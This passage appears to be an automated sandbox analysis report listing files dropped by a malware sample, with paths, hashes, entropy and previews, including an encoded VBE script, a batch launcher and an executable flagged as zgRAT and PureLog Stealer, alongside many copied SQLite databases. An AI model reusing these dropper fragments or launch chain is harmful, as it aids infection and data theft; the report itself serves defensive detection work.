SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\bMgaQKRsN5

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\bOhEYE1yAl

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\cZ8kT9bu6g

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\caU3rvMK7X

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe

Download File

Process:	C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe
File Type:	data
Category:	dropped
Size (bytes):	211
Entropy (8bit):	5.78412177169147
Encrypted:	false
SSDEEP:	6:GEwqK+NkLzWbH1rFnBaORbM5nCyhjZO/17R1:G1MCzWL1hBaORbQCyjwl
MD5:	E30EC43C2CEF82698F68268735844CC5
SHA1:	2AD9967DD2D1087FBE3DC96D79C49F08A17D38F9
SHA-256:	F6E612F2AA1D27D9C070EA07A69C4C0C9BED6E308198857EE7A1335AD7AEF48B
SHA-512:	94EC05A7ED4F1DC0A59C12E394C651290E31B12B37A0EA80E73C362C8D1AAD6BFEBB2C6A87790EE9E59164EF3A16F8282695CCF94EFFA6D4570989621E1CAEC8
Malicious:	true
Preview:	#@~^ugAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE@#@&.U^DbwO UV+n2v 0!ZT@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ@#@&q/4j4+Vs "EUPrY:+ha]Jmtmk.8DKhd+MIn-b+hgnYJzk65461c4CYES,!SP6CVk+gTsAAA==^#~@.

C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5sOqbfN.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	82
Entropy (8bit):	5.061956505136041
Encrypted:	false
SSDEEP:	3:xvPMG2vAHmWFvKSWAXmBSIu+TEAs1Pw+dx:pz2YHmAJHUjuQuwQx
MD5:	E76AF187B94B636B1C61AC0419E5B8A8
SHA1:	03A8761DEF6FAB98121EFC99256FEF93B3391781
SHA-256:	CA364AB0BDCEA783A389667F2B41CE4FF5CA304172422D398E947D5D6A4E5B20
SHA-512:	F2BEAA0D4472ECA942519F56AAC4C0DA1DA13D7E9CED01493ADEC053B9ABC4802FAD8A60B7CA2627E2349F16E6F19CA034137C3322CA7167A126856CCE1DACEC
Malicious:	false
Preview:	%qJoCHXK%%HTUQ%..%bKYX%"%Temp%\chainbrowserReviewNet/PerfNET.exe"%IEClBkEUktdYiRI%

C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1920000
Entropy (8bit):	7.535182328864218
Encrypted:	false
SSDEEP:	24576:4hNXfa1eVzqP3FsO+F8obr53uRdZvAADFrO0mtbnD6d5xknbg5bUEKUXOEbDzkaS:4+U5kzXDFrO0iTb0bzveEX99
MD5:	3C3B7D5864E9F151A77B33D4B9D15E3C
SHA1:	D8A0C81C551DA2C1E500EB2B56562A2AC0BE2C81
SHA-256:	DE07619885CBD439FA402A13CEDF8EDF1D67B2AE4FB078F8DC18AE7A662A7D23
SHA-512:	5204B39F1008093E95221B9A7EA14BE6BBA59A5A47D0447CFDC503C524FEF9AA4001785AC0CD333F19817B6D428E2034772F6134BC84493A74F47CCA2672D642
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 58%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....#.f.................D...........b... ........@.. ....................................@..................................a..K....... ............................................................................ ............... ..H............text...$B... ...D.................. ..`.rsrc... ............F..............@....reloc...............J..............@..B.................b......H............................x..Ea.......................................0..........(.... ........8........E....)...9...8.......8$...(.... ....~....{....9....& ....8....(.... ....8....*(.... ....~....{....:....& ....8........0..)....... ........8........E............F...........o...8........~....(s...~....(w... ....<.... ....~....{....9....& ....8....~....:.... ....~....{....9....& ....8t...~....(k... .... .... ....s....~....(o....... ....~....{....:4...& ....8)...8:... ....8

C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\ef8394841442c3

Download File

Process:	C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
File Type:	ASCII text, with very long lines (428), with no line terminators
Category:	dropped
Size (bytes):	428
Entropy (8bit):	5.839453956682053
Encrypted:	false
SSDEEP:	12:N6IsIiVHf1dhvIueksG0Sfbzvm8MC55eV3U1+W:NIIeHfZT0E/beV3Kp
MD5:	87D7038E4B5C34604D49D3700883E708
SHA1:	2ECEEAF527C83A6BCC1AB13E0CFDBAFF3599DF16
SHA-256:	22EBEEDD36C37D2CB9425D7B0BB4DBDC89232A1F0A2B9C04C92BEDF896A49467
SHA-512:	63728A0BA57C672E7624756A944E391E49568887CC5406C916E3975060B66C92B4E11795822D6ABCA814969A2D99576528BFC4EFE7DA3B9DF8156ADFC07BA415
Malicious:	false
Preview:	VTv2gs1Y6avPmwondipjK4vk3TErn7WbWUvad0LeRbBzdub7x5MNODQahL9NnKv8DU3RAOJnXKRs36HI2G4svIMSEV2S071HqCvJ1J7jvi0EvhglD0UhPCN5IkMoV0wZTKC1L8RsJV7MSIhhyROAmT1oy0AR6SN4wavlfoaFjmY4FBm9Dp0Dlww9SXCU79v0HCZ1X5BJ1JaA57jxNBORcKTAovTHmFIj0hwClumHnqMcVvDUyOH6veY7tZNlm4hvA1KYLgMcYGnw80p2r8SX8MxWIzTLhBftIacdlpJSBohp0m92uU3olJxyDyQWMB5Wk4nhYLRCyAVToIfgzabNI0H9mnawZxFAsLE59bejC00lxdK5StgwkrOtxn5uvfnA4VkdDkgY61KRAfLIdedpRTaA6UHVgtxhMzqc2q2sNIzs

C:\Users\user\AppData\Local\Temp\e1rLMoMwz2

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\eGMfOX2dwu

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ePMhNczl3k

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\eTbwdV2QMh

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ehJLBTQxSR

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\esFsRuMpPC

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\f6GcdThimV

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\f8IhSNsLbP

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\fHmWupSCwz

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\fJzqFTjiAq

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\fb8DslqprJ

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\feV71x7S7A

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\fqzxg3A6nz

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\g5oiWcvzAx

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\g7TjgUELCd

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\gdrCXhQWCy

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\gh07FJ1ZGj

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
